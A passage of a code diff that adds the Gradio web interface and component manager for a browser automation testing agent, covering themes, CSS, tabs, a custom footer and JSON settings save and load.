    webui_manager.add_components("deep_research_agent", tab_components)
    webui_manager.init_deep_research_agent()

    async def update_wrapper(mcp_file):
        """Forward MCP file changes to update_mcp_server and yield its updates."""
        update_dict = await update_mcp_server(mcp_file, webui_manager)
        yield update_dict

    # NOTE(review): the same component is listed twice so the two returned
    # values (content, visibility update) both target mcp_server_config —
    # confirm the installed Gradio version accepts duplicate outputs.
    mcp_json_file.change(
        update_wrapper,
        inputs=[mcp_json_file],
        outputs=[mcp_server_config, mcp_server_config]
    )

    dr_tab_outputs = list(tab_components.values())
    # All registered components (all tabs) are passed as inputs so handlers
    # can read cross-tab settings from the components dict.
    all_managed_inputs = set(webui_manager.get_components())

    # --- Define Event Handler Wrappers ---
    async def start_wrapper(comps: Dict[Component, Any]) -> AsyncGenerator[Dict[Component, Any], None]:
        async for update in run_deep_research(webui_manager, comps):
            yield update

    async def stop_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
        update_dict = await stop_deep_research(webui_manager)
        yield update_dict

    # --- Connect Handlers ---
    start_button.click(
        fn=start_wrapper,
        inputs=all_managed_inputs,
        outputs=dr_tab_outputs
    )

    stop_button.click(
        fn=stop_wrapper,
        inputs=None,
        outputs=dr_tab_outputs
    )
|
src/webui/interface.py
ADDED
|
@@ -0,0 +1,179 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Web Interface
|
| 3 |
+
=========================================================
|
| 4 |
+
|
| 5 |
+
Web UI components for the Fagun Browser Automation Testing Agent.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import gradio as gr
|
| 13 |
+
|
| 14 |
+
from src.webui.webui_manager import WebuiManager
|
| 15 |
+
from src.webui.components.agent_settings_tab import create_agent_settings_tab
|
| 16 |
+
from src.webui.components.browser_settings_tab import create_browser_settings_tab
|
| 17 |
+
from src.webui.components.browser_use_agent_tab import create_browser_use_agent_tab
|
| 18 |
+
|
| 19 |
+
# Maps a human-readable theme name (selectable at create_ui time) to its
# instantiated Gradio theme object.
theme_map = {
    "Default": gr.themes.Default(),
    "Soft": gr.themes.Soft(),
    "Monochrome": gr.themes.Monochrome(),
    "Glass": gr.themes.Glass(),
    "Origin": gr.themes.Origin(),
    "Citrus": gr.themes.Citrus(),
    "Ocean": gr.themes.Ocean(),
    "Base": gr.themes.Base()
}
|
| 29 |
+
|
| 30 |
+
|
| 31 |
+
def create_ui(theme_name="Ocean"):
    """Build and return the Gradio Blocks application.

    Args:
        theme_name: Key into ``theme_map`` selecting the Gradio theme.

    Returns:
        The assembled ``gr.Blocks`` demo (caller launches it).
    """
    # Custom CSS: fixed header bar, hidden default Gradio footer, and
    # overrides to keep the header visible despite Gradio hide classes.
    css = """
    .gradio-container {
        width: 70vw !important; 
        max-width: 70% !important; 
        margin-left: auto !important;
        margin-right: auto !important;
        padding-top: 100px !important;
    }
    .header-text {
        text-align: center;
        margin-bottom: 20px;
        position: fixed !important;
        top: 0 !important;
        left: 0 !important;
        right: 0 !important;
        z-index: 1000 !important;
        background-color: var(--body-background-fill) !important;
        padding: 20px 0 !important;
        border-bottom: 2px solid var(--border-color-primary) !important;
        box-shadow: 0 2px 4px rgba(0,0,0,0.1) !important;
        line-height: 1.2 !important;
    }
    .header-text h1 {
        margin: 0 0 10px 0 !important;
        font-size: 2.5em !important;
        line-height: 1.1 !important;
    }
    .header-text h3 {
        margin: 0 !important;
        font-size: 1.2em !important;
        line-height: 1.2 !important;
        opacity: 0.9 !important;
    }
    .tab-header-text {
        text-align: center;
    }
    .theme-section {
        margin-bottom: 10px;
        padding: 15px;
        border-radius: 10px;
    }
    /* Hide default Gradio footer */
    .gradio-container footer {
        display: none !important;
    }
    .gradio-container .footer {
        display: none !important;
    }
    /* Override hide-container behavior for header */
    .hide-container {
        display: block !important;
        visibility: visible !important;
        opacity: 1 !important;
    }
    /* Ensure header is always visible */
    .header-text, .header-text * {
        display: block !important;
        visibility: visible !important;
        opacity: 1 !important;
        position: fixed !important;
        top: 0 !important;
        left: 0 !important;
        right: 0 !important;
        z-index: 1000 !important;
    }
    /* Override any Gradio hiding classes for header */
    .header-text.hide-container,
    .header-text.svelte-11xb1hd,
    .header-text.padded,
    .header-text.auto-margin {
        display: block !important;
        visibility: visible !important;
        opacity: 1 !important;
        position: fixed !important;
        top: 0 !important;
        left: 0 !important;
        right: 0 !important;
        z-index: 1000 !important;
    }
    """

    # dark mode in default: redirect once to ?__theme=dark if not already set.
    js_func = """
    function refresh() {
        const url = new URL(window.location);

        if (url.searchParams.get('__theme') !== 'dark') {
            url.searchParams.set('__theme', 'dark');
            window.location.href = url.href;
        }
    }
    """

    # Shared state/registry passed to every tab builder.
    ui_manager = WebuiManager()

    with gr.Blocks(
            title="Fagun Browser Automation Testing Agent", theme=theme_map[theme_name], css=css, js=js_func,
            head="""
            <link rel="icon" href="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>🤖</text></svg>">
            <meta name="viewport" content="width=device-width, initial-scale=1.0">
            """,
    ) as demo:
        # Fixed page header.
        with gr.Row():
            gr.Markdown(
                """
                # 🤖 Fagun Browser Automation Testing Agent
                """,
                elem_classes=["header-text"],
            )

        # Tab builders register their components on ui_manager.
        with gr.Tabs() as tabs:
            with gr.TabItem("⚙️ Agent Settings"):
                create_agent_settings_tab(ui_manager)

            with gr.TabItem("🌐 Browser Settings"):
                create_browser_settings_tab(ui_manager)

            with gr.TabItem("🤖 Run Agent"):
                create_browser_use_agent_tab(ui_manager)

        # Custom Footer (replaces the hidden default Gradio footer).
        with gr.Row():
            gr.HTML(
                """
                <div style="text-align: center; margin-top: 20px; padding: 10px; border-top: 1px solid #ccc;">
                    <p style="margin: 5px 0;">
                        <a href="https://www.linkedin.com/in/mejbaur/" target="_blank" style="text-decoration: none; color: #0077b5;">
                            Connect with Builder
                        </a>
                    </p>
                    <p style="margin: 5px 0; font-weight: bold; font-size: 1.1em; background: linear-gradient(45deg, #ff6b6b, #4ecdc4, #45b7d1, #96ceb4, #feca57, #ff9ff3, #54a0ff); background-size: 400% 400%; -webkit-background-clip: text; -webkit-text-fill-color: transparent; background-clip: text; animation: gradientShift 3s ease-in-out infinite;">
                        Mejbaur Bahar Fagun
                    </p>
                    <p style="margin: 5px 0; color: #666; font-size: 0.9em;">
                        Software Engineer in Test
                    </p>
                </div>
                <style>
                @keyframes gradientShift {
                    0% { background-position: 0% 50%; }
                    50% { background-position: 100% 50%; }
                    100% { background-position: 0% 50%; }
                }
                </style>
                """
            )

    return demo
|
src/webui/webui_manager.py
ADDED
|
@@ -0,0 +1,146 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - WebUI Manager
|
| 3 |
+
=========================================================
|
| 4 |
+
|
| 5 |
+
Core management system for the Fagun Browser Automation Testing Agent.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import json
|
| 13 |
+
from collections.abc import Generator
|
| 14 |
+
from typing import TYPE_CHECKING
|
| 15 |
+
import os
|
| 16 |
+
import gradio as gr
|
| 17 |
+
from datetime import datetime
|
| 18 |
+
from typing import Optional, Dict, List
|
| 19 |
+
import uuid
|
| 20 |
+
import asyncio
|
| 21 |
+
import time
|
| 22 |
+
|
| 23 |
+
from gradio.components import Component
|
| 24 |
+
from browser_use.browser.browser import Browser
|
| 25 |
+
from browser_use.browser.context import BrowserContext
|
| 26 |
+
from browser_use.agent.service import Agent
|
| 27 |
+
from src.browser.custom_browser import CustomBrowser
|
| 28 |
+
from src.browser.custom_context import CustomBrowserContext
|
| 29 |
+
from src.controller.custom_controller import CustomController
|
| 30 |
+
from src.agent.deep_research.deep_research_agent import DeepResearchAgent
|
| 31 |
+
|
| 32 |
+
|
| 33 |
+
class WebuiManager:
|
| 34 |
+
    def __init__(self, settings_save_dir: str = "./tmp/webui_settings"):
        """Create the manager with an empty component registry.

        Args:
            settings_save_dir: Directory for persisted UI settings;
                created on construction if missing.
        """
        # Bidirectional registry between "tab.name" ids and Gradio components.
        self.id_to_component: dict[str, Component] = {}
        self.component_to_id: dict[Component, str] = {}

        self.settings_save_dir = settings_save_dir
        os.makedirs(self.settings_save_dir, exist_ok=True)
|
| 40 |
+
|
| 41 |
+
def init_browser_use_agent(self) -> None:
|
| 42 |
+
"""
|
| 43 |
+
init browser use agent
|
| 44 |
+
"""
|
| 45 |
+
self.bu_agent: Optional[Agent] = None
|
| 46 |
+
self.bu_browser: Optional[CustomBrowser] = None
|
| 47 |
+
self.bu_browser_context: Optional[CustomBrowserContext] = None
|
| 48 |
+
self.bu_controller: Optional[CustomController] = None
|
| 49 |
+
self.bu_chat_history: List[Dict[str, Optional[str]]] = []
|
| 50 |
+
self.bu_response_event: Optional[asyncio.Event] = None
|
| 51 |
+
self.bu_last_pdf_report: Optional[str] = None
|
| 52 |
+
self.bu_user_help_response: Optional[str] = None
|
| 53 |
+
self.bu_current_task: Optional[asyncio.Task] = None
|
| 54 |
+
self.bu_agent_task_id: Optional[str] = None
|
| 55 |
+
|
| 56 |
+
def init_deep_research_agent(self) -> None:
|
| 57 |
+
"""
|
| 58 |
+
init deep research agent
|
| 59 |
+
"""
|
| 60 |
+
self.dr_agent: Optional[DeepResearchAgent] = None
|
| 61 |
+
self.dr_current_task = None
|
| 62 |
+
self.dr_agent_task_id: Optional[str] = None
|
| 63 |
+
self.dr_save_dir: Optional[str] = None
|
| 64 |
+
|
| 65 |
+
def add_components(self, tab_name: str, components_dict: dict[str, "Component"]) -> None:
|
| 66 |
+
"""
|
| 67 |
+
Add tab components
|
| 68 |
+
"""
|
| 69 |
+
for comp_name, component in components_dict.items():
|
| 70 |
+
comp_id = f"{tab_name}.{comp_name}"
|
| 71 |
+
self.id_to_component[comp_id] = component
|
| 72 |
+
self.component_to_id[component] = comp_id
|
| 73 |
+
|
| 74 |
+
def get_components(self) -> list["Component"]:
|
| 75 |
+
"""
|
| 76 |
+
Get all components
|
| 77 |
+
"""
|
| 78 |
+
return list(self.id_to_component.values())
|
| 79 |
+
|
| 80 |
+
def get_component_by_id(self, comp_id: str) -> "Component":
|
| 81 |
+
"""
|
| 82 |
+
Get component by id
|
| 83 |
+
"""
|
| 84 |
+
return self.id_to_component[comp_id]
|
| 85 |
+
|
| 86 |
+
def get_id_by_component(self, comp: "Component") -> str:
|
| 87 |
+
"""
|
| 88 |
+
Get id by component
|
| 89 |
+
"""
|
| 90 |
+
return self.component_to_id[comp]
|
| 91 |
+
|
| 92 |
+
def save_config(self, components: Dict["Component", str]) -> None:
|
| 93 |
+
"""
|
| 94 |
+
Save config
|
| 95 |
+
"""
|
| 96 |
+
cur_settings = {}
|
| 97 |
+
for comp in components:
|
| 98 |
+
if not isinstance(comp, gr.Button) and not isinstance(comp, gr.File) and str(
|
| 99 |
+
getattr(comp, "interactive", True)).lower() != "false":
|
| 100 |
+
comp_id = self.get_id_by_component(comp)
|
| 101 |
+
cur_settings[comp_id] = components[comp]
|
| 102 |
+
|
| 103 |
+
config_name = datetime.now().strftime("%Y%m%d-%H%M%S")
|
| 104 |
+
with open(os.path.join(self.settings_save_dir, f"{config_name}.json"), "w") as fw:
|
| 105 |
+
json.dump(cur_settings, fw, indent=4)
|
| 106 |
+
|
| 107 |
+
return os.path.join(self.settings_save_dir, f"{config_name}.json")
|
| 108 |
+
|
| 109 |
+
def load_config(self, config_path: str):
|
| 110 |
+
"""
|
| 111 |
+
Load config
|
| 112 |
+
"""
|
| 113 |
+
with open(config_path, "r") as fr:
|
| 114 |
+
ui_settings = json.load(fr)
|
| 115 |
+
|
| 116 |
+
update_components = {}
|
| 117 |
+
for comp_id, comp_val in ui_settings.items():
|
| 118 |
+
if comp_id in self.id_to_component:
|
| 119 |
+
comp = self.id_to_component[comp_id]
|
| 120 |
+
if comp.__class__.__name__ == "Chatbot":
|
| 121 |
+
update_components[comp] = comp.__class__(value=comp_val, type="messages")
|
| 122 |
+
else:
|
| 123 |
+
update_components[comp] = comp.__class__(value=comp_val)
|
| 124 |
+
if comp_id == "agent_settings.planner_llm_provider":
|
| 125 |
+
yield update_components # yield provider, let callback run
|
| 126 |
+
time.sleep(0.1) # wait for Gradio UI callback
|
| 127 |
+
|
| 128 |
+
# Note: load_save_config component was removed from the interface
|
| 129 |
+
yield update_components
|
| 130 |
+
|
| 131 |
+
def update_pdf_report_status(self, report_path: Optional[str] = None, status_message: str = "Report will be generated automatically after testing completion"):
|
| 132 |
+
"""Update the PDF report status and file."""
|
| 133 |
+
update_components = {}
|
| 134 |
+
|
| 135 |
+
# Update report status
|
| 136 |
+
if "browser_use_agent.auto_report_status" in self.id_to_component:
|
| 137 |
+
status_comp = self.id_to_component["browser_use_agent.auto_report_status"]
|
| 138 |
+
update_components[status_comp] = status_comp.__class__(value=status_message)
|
| 139 |
+
|
| 140 |
+
# Update report file if path is provided
|
| 141 |
+
if report_path and "browser_use_agent.auto_pdf_report" in self.id_to_component:
|
| 142 |
+
report_comp = self.id_to_component["browser_use_agent.auto_pdf_report"]
|
| 143 |
+
update_components[report_comp] = report_comp.__class__(value=report_path, visible=True)
|
| 144 |
+
self.bu_last_pdf_report = report_path
|
| 145 |
+
|
| 146 |
+
return update_components
|